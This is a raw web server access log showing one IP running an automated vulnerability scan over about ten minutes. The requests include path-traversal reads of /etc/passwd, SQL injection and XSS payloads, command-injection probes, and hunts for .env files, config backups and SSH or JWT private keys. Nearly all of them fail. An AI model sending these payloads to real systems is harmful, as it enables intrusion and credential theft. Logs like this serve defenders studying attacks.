195.164.49.69 - - [20/Oct/2024:15:41:44 +0000] GET /wp-config.php.SAVE HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:41:44 +0000] GET /wp-config.old HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:41:44 +0000] GET /wp-config.php~ HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:41:44 +0000] GET /wp-config.txt HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:41:45 +0000] GET /wp-config.php.original HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:41:45 +0000] GET /wp-config.php.txt HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:41:45 +0000] GET /wp-config.php.orig HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:41:45 +0000] GET /wp-config.php_orig HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:41:45 +0000] GET /wp-config.php.bak HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:41:45 +0000] GET /wp-config.php.BAK HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:41:45 +0000] GET /wp-config.backup HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:41:45 +0000] GET /wp-config.php.old HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:41:46 +0000] GET /wp-config.php.OLD HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:41:46 +0000] GET /wp-config.php.dist HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:15:42:26 +0000] GET /config.php.zip HTTP/1.1 404 1088
83.212.98.101 - - [20/Oct/2024:15:42:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:15:42:28 +0000] GET /config.php.tar.gz HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:42:28 +0000] GET /config.php.new HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:42:28 +0000] GET /common/config.php.new HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:42:28 +0000] GET /wp-config.php.bk HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:15:42:28 +0000] GET /home/iopanWORDPRESS.txt HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:42:29 +0000] GET /home/iopan-WORDPRESS.txt HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:42:40 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:42:42 +0000] GET /wp-content/plugins/nextgen-gallery/readme.txt HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:15:42:44 +0000] GET /ebvp/infopub/show_download_content;.js?id=1';WAITFOR+DELAY+'0:0:6'-- HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:15:43:06 +0000] GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1 404 1126
- - - [20/Oct/2024:15:43:08 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:43:10 +0000] GET /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:43:12 +0000] GET /wp-content/plugins/blogroll-fun/blogroll.php?k=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:15:43:14 +0000] GET /images/../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:43:16 +0000] GET /opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:43:18 +0000] GET /ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:43:21 +0000] GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:43:22 +0000] GET /index.php?op=fileviewer&file=/etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:43:24 +0000] GET /elmah HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:43:26 +0000] GET /elmah.axd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:43:29 +0000] GET /crx/explorer/nodetypes/index.jsp HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:15:43:30 +0000] GET /install/install.php HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:43:36 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:43:38 +0000] GET /owncloud/ HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:43:39 +0000] GET /main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:43:41 +0000] GET /main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:43:44 +0000] GET /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:43:45 +0000] GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:43:47 +0000] GET /openam/ui/PWResetUserValidation HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:15:43:49 +0000] GET /OpenAM-11.0.0/ui/PWResetUserValidation HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:15:43:51 +0000] GET /ui/PWResetUserValidation HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:15:43:53 +0000] GET /wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:43:55 +0000] GET /install/app.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:43:57 +0000] GET /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(999999999),0x7e),1) HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:43:59 +0000] GET /verify.php?id=1&confirm_hash HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:44:01 +0000] GET /mantis/verify.php?id=1&confirm_hash HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:44:03 +0000] GET /mantisBT/verify.php?id=1&confirm_hash HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:44:05 +0000] GET /mantisbt-2.3.0/verify.php?id=1&confirm_hash HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:44:07 +0000] GET /bugs/verify.php?confirm_hash&id=1 HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:44:09 +0000] GET /wp-json/wp/v2/lesson/1 HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:44:11 +0000] GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:44:13 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:44:15 +0000] GET /wp-admin/setup-config.php?step=1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:15:44:17 +0000] GET /api/downloads?fileName=../../../../../../../../etc/passwd HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:15:44:19 +0000] GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1 404 1142
195.164.49.69 - - [20/Oct/2024:15:44:21 +0000] GET /?c=../../../../../../etc/passwd%00 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:44:23 +0000] GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:44:25 +0000] GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1 404 1047
195.164.49.69 - - [20/Oct/2024:15:44:27 +0000] GET /asd/../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:44:29 +0000] GET /cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:44:32 +0000] GET /configure HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:44:33 +0000] GET /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:44:35 +0000] GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:44:39 +0000] GET /admin/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:44:41 +0000] GET /solr/admin/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:44:43 +0000] GET /index.php?option=com_departments&id=-1%20UNION%20SELECT%201,md5(999999999),3,4,5,6,7,8-- HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:44:45 +0000] GET /index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:44:48 +0000] GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1 404 1151
195.164.49.69 - - [20/Oct/2024:15:44:48 +0000] GET /go/add-on/business-continuity/api/plugin?folderName&pluginName=../../../etc/passwd HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:15:44:51 +0000] GET /api/setup-complete HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:44:53 +0000] GET /login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:15:44:54 +0000] GET /wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php HTTP/1.1 404 1172
195.164.49.69 - - [20/Oct/2024:15:44:56 +0000] GET /nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5(2000446345))%23 HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:15:44:58 +0000] GET /cgi-bin/privatekey.pem HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:45:00 +0000] GET /index.php/install HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:45:02 +0000] GET /phpwiki/index.php/passwd HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:15:45:04 +0000] GET /mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27 HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:45:08 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:15:45:10 +0000] GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:45:12 +0000] GET /spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:45:14 +0000] GET /nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:15:45:16 +0000] GET /modules/simpleimportproduct/send.php?phpinfo=1 HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:15:45:18 +0000] GET /modules/updateproducts/send.php?phpinfo=1 HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:15:45:20 +0000] GET /install HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:15:45:22 +0000] GET /umbraco/management/api/v1/server/status HTTP/1.1 404 1133
- - - [20/Oct/2024:15:45:24 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:45:26 +0000] GET /./../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:45:28 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:45:30 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:45:32 +0000] GET /git/notifyCommit?url=2nhw8W5e3ac3ORXGvfXHsnRNXWw&branches=2nhw8W5e3ac3ORXGvfXHsnRNXWw HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:45:34 +0000] GET /static/link/%2e%2e/etc/passwd HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:15:45:36 +0000] GET /.netrc HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:15:45:38 +0000] GET /_netrc HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:15:45:40 +0000] GET /sftp.json HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:45:42 +0000] GET /.config/sftp.json HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:45:44 +0000] GET /.vscode/sftp.json HTTP/1.1 404 1095
83.212.98.101 - - [20/Oct/2024:15:45:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:15:45:46 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:45:48 +0000] GET /device.rsp?opt=user&cmd=list HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:45:51 +0000] GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1 404 1230
195.164.49.69 - - [20/Oct/2024:15:45:52 +0000] GET /Admin/Admin.aspx HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:45:54 +0000] GET /Default.aspx HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:45:56 +0000] GET /download.php?file=/etc/passwd HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:46:00 +0000] GET /chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:15:46:02 +0000] GET /onlinePreview?url=aHR0cDovL29hc3QuZnVuL3JvYm90cy50eHQ= HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:46:04 +0000] GET /setup.cgi?next_file=debug.htm&x=currentsetting.htm HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:46:06 +0000] GET /?subreddit=news&score=2134%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:46:13 +0000] GET /?echo+zGmZjUGWWu HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:46:15 +0000] POST /CDGServer3/ClientAjax HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:15:46:16 +0000] POST /magmi/web/magmi_saveprofile.php HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:15:46:18 +0000] POST /magmi/web/magmi_run.php HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:15:46:20 +0000] GET /magmi/web/info.php HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:15:46:22 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:46:24 +0000] GET /status.htm HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:46:28 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:46:34 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:46:36 +0000] GET /../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:46:38 +0000] GET /wp-json/lp/v1/courses/archive-course?order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:15:46:41 +0000] POST /classes/common/busiFacade.php HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:15:46:46 +0000] POST /ajax/calendar.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:46:47 +0000] GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1 200 11204
- - - [20/Oct/2024:15:46:49 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:15:46:51 +0000] GET /login.rst HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:46:53 +0000] GET /Login.aspx HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:46:55 +0000] POST /openam/json/realms/root/authenticate HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:15:46:57 +0000] PUT /api/v2/simulation HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:15:46:59 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:47:01 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:47:03 +0000] GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1)%20AND%20(SELECT%201864%20FROM%20(SELECT(SLEEP(6)))gOGh)%20AND%20(6900=6900&salary-type=1&sort=id&subcat HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:15:47:06 +0000] GET /__weave/file/tmp/weave/fs/../../../etc/passwd HTTP/1.1 404 1155
195.164.49.69 - - [20/Oct/2024:15:47:07 +0000] GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:15:47:10 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:15:47:11 +0000] GET /.webui/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:15:47:13 +0000] POST /apisix/admin/user/login HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:15:47:16 +0000] POST /client/api/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:47:17 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:47:19 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:47:20 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:47:20 +0000] POST /_session HTTP/1.1 404 1082
83.212.98.101 - - [20/Oct/2024:15:47:27 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:15:47:27 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:47:27 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:47:27 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:47:28 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:47:28 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:47:28 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:47:28 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:47:28 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:47:28 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:47:28 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:47:28 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:47:29 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:47:29 +0000] POST /_session HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:47:51 +0000] POST /rest/auth/login HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:47:53 +0000] POST /member/authenticate HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:15:47:55 +0000] GET /exciter.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:47:57 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:47:59 +0000] GET /prop.htm HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:48:07 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:48:07 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:48:07 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:48:08 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:48:08 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:48:08 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:48:08 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:48:08 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:48:09 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:48:09 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:48:09 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:48:09 +0000] GET /default/en_US/status.html HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:15:48:25 +0000] GET /sites/web_vhost_domain_list.php HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:15:48:26 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:48:26 +0000] POST /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:48:27 +0000] GET /sites/web_vhost_domain_list.php HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:15:48:27 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:48:27 +0000] POST /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:48:27 +0000] GET /sites/web_vhost_domain_list.php HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:15:48:27 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:48:27 +0000] POST /login/index.php HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:48:43 +0000] POST /api/tokens HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:48:45 +0000] POST /xmlpserver/services/XMLPService HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:15:48:47 +0000] POST /index.php?action=login.index HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:48:49 +0000] POST /login.php?action=login&type=admin HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:48:51 +0000] GET /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:48:53 +0000] POST /login HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:15:48:55 +0000] GET /api/.env HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:49:05 +0000] GET /.env.example HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:15:49:07 +0000] GET /.env.stage HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:49:07 +0000] GET /.env.live HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:49:07 +0000] GET /.env.backup HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:49:07 +0000] GET /.env.save HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:49:07 +0000] GET /.env.old HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:49:08 +0000] GET /.env.www HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:49:08 +0000] GET /.env_1 HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:15:49:08 +0000] GET /.env_sample HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:49:08 +0000] GET /.env.iopan HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:49:08 +0000] GET /.env.sdc HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:49:28 +0000] GET /.env.prod.local HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:49:28 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:15:49:29 +0000] GET /.env.bak HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:49:29 +0000] GET /.env.dev HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:49:29 +0000] GET /.env.dev.local HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:49:29 +0000] GET /.env.development.local HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:15:49:29 +0000] GET /.env.prod HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:15:49:30 +0000] GET /.env.production HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:49:30 +0000] GET /.env.production.local HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:49:31 +0000] GET /.env.local HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:49:41 +0000] GET /ssl/localhost.key HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:15:49:41 +0000] GET /localhost.key HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:15:49:41 +0000] GET /host.key HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:15:49:41 +0000] GET /www.key HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:15:49:42 +0000] GET /private-key HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:49:42 +0000] GET /privatekey.key HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:15:49:42 +0000] GET /server.key HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:15:49:42 +0000] GET /my.key HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:15:49:42 +0000] GET /key.pem HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:15:49:48 +0000] GET /id_rsa_2048 HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:49:49 +0000] GET /ssl/sdc.iopan.pl:80.key HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:49:49 +0000] GET /id_rsa HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:15:49:49 +0000] GET /id_dsa HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:15:49:49 +0000] GET /id_rsa_1024 HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:49:49 +0000] GET /.ssh/id_rsa HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:49:49 +0000] GET /id_rsa_3072 HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:49:49 +0000] GET /id_rsa_4096 HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:50:03 +0000] GET /.ssh/id_rsa_2048 HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:50:03 +0000] GET /.ssh/id_dsa HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:15:50:03 +0000] GET /.ssh/id_rsa_1024 HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:50:03 +0000] GET /config/jwt/private.pem HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:15:50:03 +0000] GET /.ssh/id_rsa_3072 HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:50:03 +0000] GET /.ssh/id_rsa_4096 HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:15:50:04 +0000] GET /sdc.iopan.pl:80.key HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:50:04 +0000] GET /sdc.iopan.pl:80.pem HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:50:30 +0000] GET /jwt/private.pem HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:15:50:30 +0000] GET /var/jwt/private.pem HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:15:50:31 +0000] GET /private.pem HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:15:50:31 +0000] GET /ssl.txt HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:15:50:31 +0000] GET /ssl_key.txt HTTP/1.1 404 1085
